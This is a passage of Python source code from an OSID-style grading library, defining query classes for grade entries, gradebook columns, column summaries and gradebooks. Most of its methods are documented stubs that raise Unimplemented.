*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
derived_terms = property(fdel=clear_derived_terms)
@utilities.arguments_not_none
def match_overridden_grade_entry_id(self, grade_entry_id, match):
"""Sets the grade entry ``Id`` for an overridden calculated grade entry.
arg: grade_entry_id (osid.id.Id): a grade entry ``Id``
arg: match (boolean): ``true`` for a positive match,
``false`` for a negative match
raise: NullArgument - ``grade_entry_id`` is ``null``
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.match_avatar_id
self._add_match('overriddenGradeEntryId', str(grade_entry_id), match)
def clear_overridden_grade_entry_id_terms(self):
"""Clears the overridden grade entry ``Id`` terms.
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.clear_avatar_id
self._clear_terms('overriddenGradeEntryId')
overridden_grade_entry_id_terms = property(fdel=clear_overridden_grade_entry_id_terms)
def supports_overridden_grade_entry_query(self):
"""Tests if a ``GradeEntry`` is available for querying overridden calculated grade entries.
return: (boolean) - ``true`` if a grade entry query is
available, ``false`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def get_overridden_grade_entry_query(self):
"""Gets the query for an overridden derived grade entry.
Multiple retrievals produce a nested ``OR`` term.
return: (osid.grading.GradeEntryQuery) - the grade entry query
raise: Unimplemented -
``supports_overridden_grade_entry_query()`` is ``false``
*compliance: optional -- This method must be implemented if
``supports_overridden_grade_entry_query()`` is ``true``.*
"""
raise errors.Unimplemented()
overridden_grade_entry_query = property(fget=get_overridden_grade_entry_query)
@utilities.arguments_not_none
def match_any_overridden_grade_entry(self, match):
"""Matches grade entries overriding any calculated grade entry.
arg: match (boolean): ``true`` to match grade entries
overriding any grade entry, ``false`` to match entries
not overriding any entry
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def clear_overridden_grade_entry_terms(self):
"""Clears the overridden grade entry terms.
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
overridden_grade_entry_terms = property(fdel=clear_overridden_grade_entry_terms)
@utilities.arguments_not_none
def match_ignored_for_calculations(self, match):
"""Matches grade entries ignored for calculations.
arg: match (boolean): ``true`` to match grade entries ignored
for calculations, ``false`` to match entries used in
calculations
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def clear_ignored_for_calculations_terms(self):
"""Clears the ignored for calculation entries terms.
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.clear_group_terms
self._clear_terms('ignoredForCalculations')
ignored_for_calculations_terms = property(fdel=clear_ignored_for_calculations_terms)
@utilities.arguments_not_none
def match_grade_id(self, grade_id, match):
"""Sets the grade ``Id`` for this query.
arg: grade_id (osid.id.Id): a grade ``Id``
arg: match (boolean): ``true`` for a positive match,
``false`` for a negative match
raise: NullArgument - ``grade_id`` is ``null``
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.match_avatar_id
self._add_match('gradeId', str(grade_id), match)
def clear_grade_id_terms(self):
"""Clears the grade ``Id`` terms.
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.clear_avatar_id
self._clear_terms('gradeId')
grade_id_terms = property(fdel=clear_grade_id_terms)
def supports_grade_query(self):
"""Tests if a ``GradeQuery`` is available for querying grades.
return: (boolean) - ``true`` if a grade query is available,
``false`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def get_grade_query(self):
"""Gets the query for a grade.
Multiple retrievals produce a nested ``OR`` term.
return: (osid.grading.GradeQuery) - the grade query
raise: Unimplemented - ``supports_grade_query()`` is ``false``
*compliance: optional -- This method must be implemented if
``supports_grade_query()`` is ``true``.*
"""
raise errors.Unimplemented()
grade_query = property(fget=get_grade_query)
@utilities.arguments_not_none
def match_any_grade(self, match):
"""Matches grade entries with any grade.
arg: match (boolean): ``true`` to match grade entries with
any grade, ``false`` to match entries with no grade
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def clear_grade_terms(self):
"""Clears the grade terms.
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.clear_group_terms
self._clear_terms('grade')
grade_terms = property(fdel=clear_grade_terms)
@utilities.arguments_not_none
def match_score(self, start, end, match):
"""Matches grade entries which score is between the specified score inclusive.
arg: start (decimal): start of range
arg: end (decimal): end of range
arg: match (boolean): ``true`` for a positive match,
``false`` for a negative match
raise: InvalidArgument - ``end`` is less than ``start``
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
@utilities.arguments_not_none
def match_any_score(self, match):
"""Matches grade entries with any score.
arg: match (boolean): ``true`` to match grade entries with
any score, ``false`` to match entries with no score
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def clear_score_terms(self):
"""Clears the score terms.
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.clear_group_terms
self._clear_terms('score')
score_terms = property(fdel=clear_score_terms)
@utilities.arguments_not_none
def match_time_graded(self, start, end, match):
"""Matches grade entries which graded time is between the specified times inclusive.
arg: start (osid.calendaring.DateTime): start of range
arg: end (osid.calendaring.DateTime): end of range
arg: match (boolean): ``true`` for a positive match,
``false`` for a negative match
raise: InvalidArgument - ``end`` is less than ``start``
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def clear_time_graded_terms(self):
"""Clears the time graded terms.
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
time_graded_terms = property(fdel=clear_time_graded_terms)
@utilities.arguments_not_none
def match_grader_id(self, resource_id, match):
"""Sets the agent ``Id`` for this query.
arg: resource_id (osid.id.Id): a resource ``Id``
arg: match (boolean): ``true`` for a positive match,
``false`` for a negative match
raise: NullArgument - ``resource_id`` is ``null``
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.match_avatar_id
self._add_match('graderId', str(resource_id), match)
def clear_grader_id_terms(self):
"""Clears the grader ``Id`` terms.
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.clear_avatar_id
self._clear_terms('graderId')
grader_id_terms = property(fdel=clear_grader_id_terms)
def supports_grader_query(self):
"""Tests if a ``ResourceQuery`` is available for querying graders.
return: (boolean) - ``true`` if a resource query is available,
``false`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def get_grader_query(self):
"""Gets the query for an agent.
Multiple retrievals produce a nested ``OR`` term.
return: (osid.resource.ResourceQuery) - the resource query
raise: Unimplemented - ``supports_resource_query()`` is
``false``
*compliance: optional -- This method must be implemented if
``supports_resource_query()`` is ``true``.*
"""
raise errors.Unimplemented()
grader_query = property(fget=get_grader_query)
@utilities.arguments_not_none
def match_any_grader(self, match):
"""Matches grade entries with any grader.
arg: match (boolean): ``true`` to match grade entries with
any grader, ``false`` to match entries with no grader
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def clear_grader_terms(self):
"""Clears the grader terms.
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
grader_terms = property(fdel=clear_grader_terms)
@utilities.arguments_not_none
def match_grading_agent_id(self, agent_id, match):
"""Sets the grading agent ``Id`` for this query.
arg: agent_id (osid.id.Id): an agent ``Id``
arg: match (boolean): ``true`` for a positive match,
``false`` for a negative match
raise: NullArgument - ``agent_id`` is ``null``
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.match_avatar_id
self._add_match('gradingAgentId', str(agent_id), match)
def clear_grading_agent_id_terms(self):
"""Clears the grader ``Id`` terms.
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.clear_avatar_id
self._clear_terms('gradingAgentId')
grading_agent_id_terms = property(fdel=clear_grading_agent_id_terms)
def supports_grading_agent_query(self):
"""Tests if an ``AgentQuery`` is available for querying grading agents.
return: (boolean) - ``true`` if an agent query is available,
``false`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def get_grading_agent_query(self):
"""Gets the query for an agent.
Multiple retrievals produce a nested ``OR`` term.
return: (osid.authentication.AgentQuery) - the agent query
raise: Unimplemented - ``supports_grading_agent_query()`` is
``false``
*compliance: optional -- This method must be implemented if
``supports_grading_agent_query()`` is ``true``.*
"""
raise errors.Unimplemented()
grading_agent_query = property(fget=get_grading_agent_query)
@utilities.arguments_not_none
def match_any_grading_agent(self, match):
"""Matches grade entries with any grading agent.
arg: match (boolean): ``true`` to match grade entries with
any grading agent, ``false`` to match entries with no
grading agent
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def clear_grading_agent_terms(self):
"""Clears the grading agent terms.
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
grading_agent_terms = property(fdel=clear_grading_agent_terms)
@utilities.arguments_not_none
def match_gradebook_id(self, gradebook_id, match):
"""Sets the gradebook ``Id`` for this query.
arg: gradebook_id (osid.id.Id): a gradebook ``Id``
arg: match (boolean): ``true`` for a positive match,
``false`` for a negative match
raise: NullArgument - ``gradebook_id`` is ``null``
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.match_bin_id
self._add_match('assignedGradebookIds', str(gradebook_id), match)
def clear_gradebook_id_terms(self):
"""Clears the gradebook ``Id`` terms.
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.clear_bin_id_terms
self._clear_terms('assignedGradebookIds')
gradebook_id_terms = property(fdel=clear_gradebook_id_terms)
def supports_gradebook_query(self):
"""Tests if a ``GradebookQuery`` is available for querying resources.
return: (boolean) - ``true`` if a gradebook query is available,
``false`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def get_gradebook_query(self):
"""Gets the query for a gradebook.
Multiple retrievals produce a nested ``OR`` term.
return: (osid.grading.GradebookQuery) - the gradebook query
raise: Unimplemented - ``supports_gradebook_query()`` is
``false``
*compliance: optional -- This method must be implemented if
``supports_gradebook_query()`` is ``true``.*
"""
raise errors.Unimplemented()
gradebook_query = property(fget=get_gradebook_query)
def clear_gradebook_terms(self):
"""Clears the gradebook terms.
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.clear_group_terms
self._clear_terms('gradebook')
gradebook_terms = property(fdel=clear_gradebook_terms)
@utilities.arguments_not_none
def get_grade_entry_query_record(self, grade_entry_record_type):
"""Gets the grade entry query record corresponding to the given ``GradeEntry`` record ``Type``.
Multiple retrievals produce a nested ``OR`` term.
arg: grade_entry_record_type (osid.type.Type): a grade entry
record type
return: (osid.grading.records.GradeEntryQueryRecord) - the grade
entry query record
raise: NullArgument - ``grade_entry_record_type`` is ``null``
raise: OperationFailed - unable to complete request
raise: Unsupported -
``has_record_type(grade_entry_record_type)`` is
``false``
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
class GradebookColumnQuery(abc_grading_queries.GradebookColumnQuery, osid_queries.OsidObjectQuery):
"""This is the query for searching gradings.
Each method match request produces an ``AND`` term while multiple
invocations of a method produces a nested ``OR``.
"""
def __init__(self, runtime):
self._namespace = 'grading.GradebookColumn'
self._runtime = runtime
record_type_data_sets = get_registry('GRADEBOOK_COLUMN_RECORD_TYPES', runtime)
self._all_supported_record_type_data_sets = record_type_data_sets
self._all_supported_record_type_ids = []
for data_set in record_type_data_sets:
self._all_supported_record_type_ids.append(str(Id(**record_type_data_sets[data_set])))
osid_queries.OsidObjectQuery.__init__(self, runtime)
@utilities.arguments_not_none
def match_grade_system_id(self, grade_system_id, match):
"""Sets the grade system ``Id`` for this query.
arg: grade_system_id (osid.id.Id): a grade system ``Id``
arg: match (boolean): ``true`` for a positive match,
``false`` for a negative match
raise: NullArgument - ``grade_system_id`` is ``null``
*compliance: mandatory -- This method must be implemented.*
"""
self._add_match('gradeSystemId', str(grade_system_id), bool(match))
def clear_grade_system_id_terms(self):
"""Clears the grade system ``Id`` terms.
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.clear_avatar_id
self._clear_terms('gradeSystemId')
grade_system_id_terms = property(fdel=clear_grade_system_id_terms)
def supports_grade_system_query(self):
"""Tests if a ``GradeSystemQuery`` is available for querying grade systems.
return: (boolean) - ``true`` if a grade system query is
available, ``false`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def get_grade_system_query(self):
"""Gets the query for a grade system.
Multiple retrievals produce a nested ``OR`` term.
return: (osid.grading.GradeSystemQuery) - the grade system query
raise: Unimplemented - ``supports_grade_system_query()`` is
``false``
*compliance: optional -- This method must be implemented if
``supports_grade_system_query()`` is ``true``.*
"""
raise errors.Unimplemented()
grade_system_query = property(fget=get_grade_system_query)
@utilities.arguments_not_none
def match_any_grade_system(self, match):
"""Matches gradebook columns with any grade system assigned.
arg: match (boolean): ``true`` to match columns with any
grade system, ``false`` to match columns with no grade
system
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def clear_grade_system_terms(self):
"""Clears the grade system terms.
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.clear_group_terms
self._clear_terms('gradeSystem')
grade_system_terms = property(fdel=clear_grade_system_terms)
@utilities.arguments_not_none
def match_grade_entry_id(self, grade_entry_id, match):
"""Sets the grade entry ``Id`` for this query.
arg: grade_entry_id (osid.id.Id): a grade entry ``Id``
arg: match (boolean): ``true`` for a positive match,
``false`` for a negative match
raise: NullArgument - ``grade_entry_id`` is ``null``
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.match_avatar_id
self._add_match('gradeEntryId', str(grade_entry_id), match)
def clear_grade_entry_id_terms(self):
"""Clears the grade entry ``Id`` terms.
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.clear_avatar_id
self._clear_terms('gradeEntryId')
grade_entry_id_terms = property(fdel=clear_grade_entry_id_terms)
def supports_grade_entry_query(self):
"""Tests if a ``GradeEntryQuery`` is available for querying grade entries.
return: (boolean) - ``true`` if a grade entry query is
available, ``false`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def get_grade_entry_query(self):
"""Gets the query for a grade entry.
Multiple retrievals produce a nested ``OR`` term.
return: (osid.grading.GradeEntryQuery) - the grade entry query
raise: Unimplemented - ``supports_grade_entry_query()`` is
``false``
*compliance: optional -- This method must be implemented if
``supports_grade_entry_query()`` is ``true``.*
"""
raise errors.Unimplemented()
grade_entry_query = property(fget=get_grade_entry_query)
@utilities.arguments_not_none
def match_any_grade_entry(self, match):
"""Matches gradebook columns with any grade entry assigned.
arg: match (boolean): ``true`` to match columns with any
grade entry, ``false`` to match columns with no grade
entries
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def clear_grade_entry_terms(self):
"""Clears the grade entry terms.
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
grade_entry_terms = property(fdel=clear_grade_entry_terms)
def supports_gradebook_column_summary_query(self):
"""Tests if a ``GradebookColumnSummaryQuery`` is available for querying grade systems.
return: (boolean) - ``true`` if a gradebook column summary query
interface is available, ``false`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def get_gradebook_column_summary_query(self):
"""Gets the query interface for a gradebook column summary.
Multiple retrievals produce a nested ``OR`` term.
return: (osid.grading.GradebookColumnSummaryQuery) - the
gradebook column summary query
raise: Unimplemented -
``supports_gradebook_column_summary_query()`` is
``false``
*compliance: optional -- This method must be implemented if
``supports_gradebook_column_summary_query()`` is ``true``.*
"""
raise errors.Unimplemented()
gradebook_column_summary_query = property(fget=get_gradebook_column_summary_query)
def clear_gradebook_column_summary_terms(self):
"""Clears the gradebook column summary terms.
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
gradebook_column_summary_terms = property(fdel=clear_gradebook_column_summary_terms)
@utilities.arguments_not_none
def match_gradebook_id(self, gradebook_id, match):
"""Sets the gradebook ``Id`` for this query.
arg: gradebook_id (osid.id.Id): a gradebook ``Id``
arg: match (boolean): ``true`` for a positive match,
``false`` for a negative match
raise: NullArgument - ``gradebook_id`` is ``null``
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.match_bin_id
self._add_match('assignedGradebookIds', str(gradebook_id), match)
def clear_gradebook_id_terms(self):
"""Clears the gradebook ``Id`` terms.
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.clear_bin_id_terms
self._clear_terms('assignedGradebookIds')
gradebook_id_terms = property(fdel=clear_gradebook_id_terms)
def supports_gradebook_query(self):
"""Tests if a ``GradebookQuery`` is available for querying grade systems.
return: (boolean) - ``true`` if a gradebook query interface is
available, ``false`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def get_gradebook_query(self):
"""Gets the query interface for a gradebook.
Multiple retrievals produce a nested ``OR`` term.
return: (osid.grading.GradebookQuery) - the gradebook query
raise: Unimplemented - ``supports_gradebook_query()`` is
``false``
*compliance: optional -- This method must be implemented if
``supports_gradebook_query()`` is ``true``.*
"""
raise errors.Unimplemented()
gradebook_query = property(fget=get_gradebook_query)
def clear_gradebook_terms(self):
"""Clears the gradebook terms.
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.clear_group_terms
self._clear_terms('gradebook')
gradebook_terms = property(fdel=clear_gradebook_terms)
@utilities.arguments_not_none
def get_gradebook_column_query_record(self, gradebook_column_record_type):
"""Gets the gradebook column query record corresponding to the given ``GradebookColumn`` record ``Type``.
Multiple retrievals produce a nested ``OR`` term.
arg: gradebook_column_record_type (osid.type.Type): a
gradebook column record type
return: (osid.grading.records.GradebookColumnQueryRecord) - the
gradebook column query record
raise: NullArgument - ``gradebook_column_record_type`` is
``null``
raise: OperationFailed - unable to complete request
raise: Unsupported -
``has_record_type(gradebook_column_record_type)`` is
``false``
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
class GradebookColumnSummaryQuery(abc_grading_queries.GradebookColumnSummaryQuery, osid_queries.OsidRuleQuery):
"""This is the query for searching gradebook column summaries.
Each method match request produces an ``AND`` term while multiple
invocations of a method produces a nested ``OR``.
"""
def __init__(self, runtime):
self._namespace = 'grading.GradebookColumnSummaryQuery'
self._runtime = runtime
record_type_data_sets = get_registry('GRADEBOOK_COLUMN_SUMMARY_QUERY_RECORD_TYPES', runtime)
self._all_supported_record_type_data_sets = record_type_data_sets
self._all_supported_record_type_ids = []
for data_set in record_type_data_sets:
self._all_supported_record_type_ids.append(str(Id(**record_type_data_sets[data_set])))
osid_queries.OsidRuleQuery.__init__(self, runtime)
@utilities.arguments_not_none
def match_gradebook_column_id(self, gradebook_column_id, match):
"""Sets the gradebook column ``Id`` for this query.
arg: gradebook_column_id (osid.id.Id): a gradeboo column
``Id``
arg: match (boolean): ``true`` for a positive match,
``false`` for a negative match
raise: NullArgument - ``gradebook_column_id`` is ``null``
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def clear_gradebook_column_id_terms(self):
"""Clears the gradebook column ``Id`` terms.
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
gradebook_column_id_terms = property(fdel=clear_gradebook_column_id_terms)
def supports_gradebook_column_query(self):
"""Tests if a ``GradebookColumnQuery`` is available for querying gradebook column.
return: (boolean) - ``true`` if a gradebook column query is
available, ``false`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def get_gradebook_column_query(self):
"""Gets the query for a gradebook column.
Multiple retrievals produce a nested ``OR`` term.
return: (osid.grading.GradebookColumnQuery) - the gradebook
column query
raise: Unimplemented - ``supports_gradebook_column_query()`` is
``false``
*compliance: optional -- This method must be implemented if
``supports_gradebook_column_query()`` is ``true``.*
"""
raise errors.Unimplemented()
gradebook_column_query = property(fget=get_gradebook_column_query)
@utilities.arguments_not_none
def match_any_gradebook_column(self, match):
"""Matches gradebook column derivations with any gradebookc olumn.
arg: match (boolean): ``true`` to match gradebook column
derivations with any gradebook column, ``false`` to
match gradebook column derivations with no gradebook
columns
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def clear_gradebook_column_terms(self):
"""Clears the source grade system terms.
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
gradebook_column_terms = property(fdel=clear_gradebook_column_terms)
@utilities.arguments_not_none
def match_mean(self, low, high, match):
"""Matches a mean between the given values inclusive.
arg: low (decimal): low end of range
arg: high (decimal): high end of range
arg: match (boolean): ``true`` for a positive match,
``false`` for a negative match
raise: InvalidArgument - ``low`` is greater than ``high``
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def clear_mean_terms(self):
"""Clears the mean terms.
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
mean_terms = property(fdel=clear_mean_terms)
@utilities.arguments_not_none
def match_minimum_mean(self, value, match):
"""Matches a mean greater than or equal to the given value.
arg: value (decimal): minimum value
arg: match (boolean): ``true`` for a positive match,
``false`` for a negative match
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def clear_minimum_mean_terms(self):
"""Clears the minimum mean terms.
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
minimum_mean_terms = property(fdel=clear_minimum_mean_terms)
@utilities.arguments_not_none
def match_median(self, low, high, match):
"""Matches a median between the given values inclusive.
arg: low (decimal): low end of range
arg: high (decimal): high end of range
arg: match (boolean): ``true`` for a positive match,
``false`` for a negative match
raise: InvalidArgument - ``low`` is greater than ``high``
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def clear_median_terms(self):
"""Clears the median terms.
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
median_terms = property(fdel=clear_median_terms)
@utilities.arguments_not_none
def match_minimum_median(self, value, match):
"""Matches a median greater than or equal to the given value.
arg: value (decimal): minimum value
arg: match (boolean): ``true`` for a positive match,
``false`` for a negative match
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def clear_minimum_median_terms(self):
"""Clears the minimum median terms.
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
minimum_median_terms = property(fdel=clear_minimum_median_terms)
@utilities.arguments_not_none
def match_mode(self, low, high, match):
"""Matches a mode between the given values inclusive.
arg: low (decimal): low end of range
arg: high (decimal): high end of range
arg: match (boolean): ``true`` for a positive match,
``false`` for a negative match
raise: InvalidArgument - ``low`` is greater than ``high``
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def clear_mode_terms(self):
"""Clears the mode terms.
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
mode_terms = property(fdel=clear_mode_terms)
@utilities.arguments_not_none
def match_minimum_mode(self, value, match):
"""Matches a mode greater than or equal to the given value.
arg: value (decimal): minimum value
arg: match (boolean): ``true`` for a positive match,
``false`` for a negative match
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def clear_minimum_mode_terms(self):
"""Clears the minimum mode terms.
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
minimum_mode_terms = property(fdel=clear_minimum_mode_terms)
@utilities.arguments_not_none
def match_rms(self, low, high, match):
"""Matches a root mean square between the given values inclusive.
arg: low (decimal): low end of range
arg: high (decimal): high end of range
arg: match (boolean): ``true`` for a positive match,
``false`` for a negative match
raise: InvalidArgument - ``low`` is greater than ``high``
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def clear_rms_terms(self):
"""Clears the root mean square terms.
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
rms_terms = property(fdel=clear_rms_terms)
@utilities.arguments_not_none
def match_minimum_rms(self, value, match):
"""Matches a root mean square greater than or equal to the given value.
arg: value (decimal): minimum value
arg: match (boolean): ``true`` for a positive match,
``false`` for a negative match
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def clear_minimum_rms_terms(self):
"""Clears the minimum RMS terms.
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
minimum_rms_terms = property(fdel=clear_minimum_rms_terms)
@utilities.arguments_not_none
def match_standard_deviation(self, low, high, match):
"""Matches a standard deviation mean square between the given values inclusive.
arg: low (decimal): low end of range
arg: high (decimal): high end of range
arg: match (boolean): ``true`` for a positive match,
``false`` for a negative match
raise: InvalidArgument - ``low`` is greater than ``high``
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def clear_standard_deviation_terms(self):
"""Clears the standard deviation terms.
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
standard_deviation_terms = property(fdel=clear_standard_deviation_terms)
@utilities.arguments_not_none
def match_minimum_standard_deviation(self, value, match):
"""Matches a standard deviation greater than or equal to the given value.
arg: value (decimal): minimum value
arg: match (boolean): ``true`` for a positive match,
``false`` for a negative match
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def clear_minimum_standard_deviation_terms(self):
"""Clears the minimum standard deviation terms.
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
minimum_standard_deviation_terms = property(fdel=clear_minimum_standard_deviation_terms)
@utilities.arguments_not_none
def match_sum(self, low, high, match):
"""Matches a sum mean square between the given values inclusive.
arg: low (decimal): low end of range
arg: high (decimal): high end of range
arg: match (boolean): ``true`` for a positive match,
``false`` for a negative match
raise: InvalidArgument - ``low`` is greater than ``high``
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def clear_sum_terms(self):
"""Clears the sum terms.
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
sum_terms = property(fdel=clear_sum_terms)
@utilities.arguments_not_none
def match_minimum_sum(self, value, match):
"""Matches a sum greater than or equal to the given value.
arg: value (decimal): minimum value
arg: match (boolean): ``true`` for a positive match,
``false`` for a negative match
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def clear_minimum_sum_terms(self):
"""Clears the minimum sum terms.
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
minimum_sum_terms = property(fdel=clear_minimum_sum_terms)
@utilities.arguments_not_none
def match_gradebook_id(self, gradebook_id, match):
"""Sets the gradebook ``Id`` for this query.
arg: gradebook_id (osid.id.Id): a gradebook ``Id``
arg: match (boolean): ``true`` for a positive match,
``false`` for a negative match
raise: NullArgument - ``gradebook_id`` is ``null``
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def clear_gradebook_id_terms(self):
"""Clears the gradebook ``Id`` terms.
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
gradebook_id_terms = property(fdel=clear_gradebook_id_terms)
def supports_gradebook_query(self):
"""Tests if a ``GradebookQuery`` is available.
return: (boolean) - ``true`` if a gradebook query is available,
``false`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def get_gradebook_query(self):
"""Gets the query for a gradebook.
Multiple retrievals produce a nested ``OR`` term.
return: (osid.grading.GradebookQuery) - the gradebook query
raise: Unimplemented - ``supports_gradebook_query()`` is
``false``
*compliance: optional -- This method must be implemented if
``supports_gradebook_column_query()`` is ``true``.*
"""
raise errors.Unimplemented()
gradebook_query = property(fget=get_gradebook_query)
def clear_gradebook_terms(self):
"""Clears the gradebook terms.
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
gradebook_terms = property(fdel=clear_gradebook_terms)
@utilities.arguments_not_none
def get_gradebook_column_summary_query_record(self, gradebook_column_summary_record_type):
"""Gets the gradebook column summary query record corresponding to the given ``GradebookColumnSummary`` record ``Type``.
Multiple retrievals produce a nested ``OR`` term.
arg: gradebook_column_summary_record_type (osid.type.Type): a
gradebook column summary record type
return: (osid.grading.records.GradebookColumnSummaryQueryRecord)
- the gradebook column summary query record
raise: NullArgument - ``gradebook_column_summary_record_type``
is ``null``
raise: OperationFailed - unable to complete request
raise: Unsupported -
``has_record_type(gradebook_column_summary_record_type)`
` is ``false``
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
class GradebookQuery(abc_grading_queries.GradebookQuery, osid_queries.OsidCatalogQuery):
"""This is the query for searching gradebooks.
Each method specifies an ``AND`` term while multiple invocations of
the same method produce a nested ``OR``.
"""
def __init__(self, runtime):
self._runtime = runtime
record_type_data_sets = get_registry('GRADEBOOK_RECORD_TYPES', runtime)
self._all_supported_record_type_data_sets = record_type_data_sets
self._all_supported_record_type_ids = []
for data_set in record_type_data_sets:
self._all_supported_record_type_ids.append(str(Id(**record_type_data_sets[data_set])))
osid_queries.OsidCatalogQuery.__init__(self, runtime)
def _get_descendant_catalog_ids(self, catalog_id):
hm = self._get_provider_manager('HIERARCHY')
hts = hm.get_hierarchy_traversal_session_for_hierarchy(
Id(authority='GRADING',
namespace='CATALOG',
identifier='GRADEBOOK')
) # What about the Proxy?
descendants = []
if hts.has_children(catalog_id):
for child_id in hts.get_children(catalog_id):
descendants += list(self._get_descendant_catalog_ids(child_id))
descendants.append(child_id)
return IdList(descendants)
@utilities.arguments_not_none
def match_grade_system_id(self, grade_system_id, match):
"""Sets the grade system ``Id`` for this query.
arg: grade_system_id (osid.id.Id): a grade system ``Id``
arg: match (boolean): ``true`` for a positive match,
``false`` for a negative match
raise: NullArgument - ``grade_system_id`` is ``null``
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
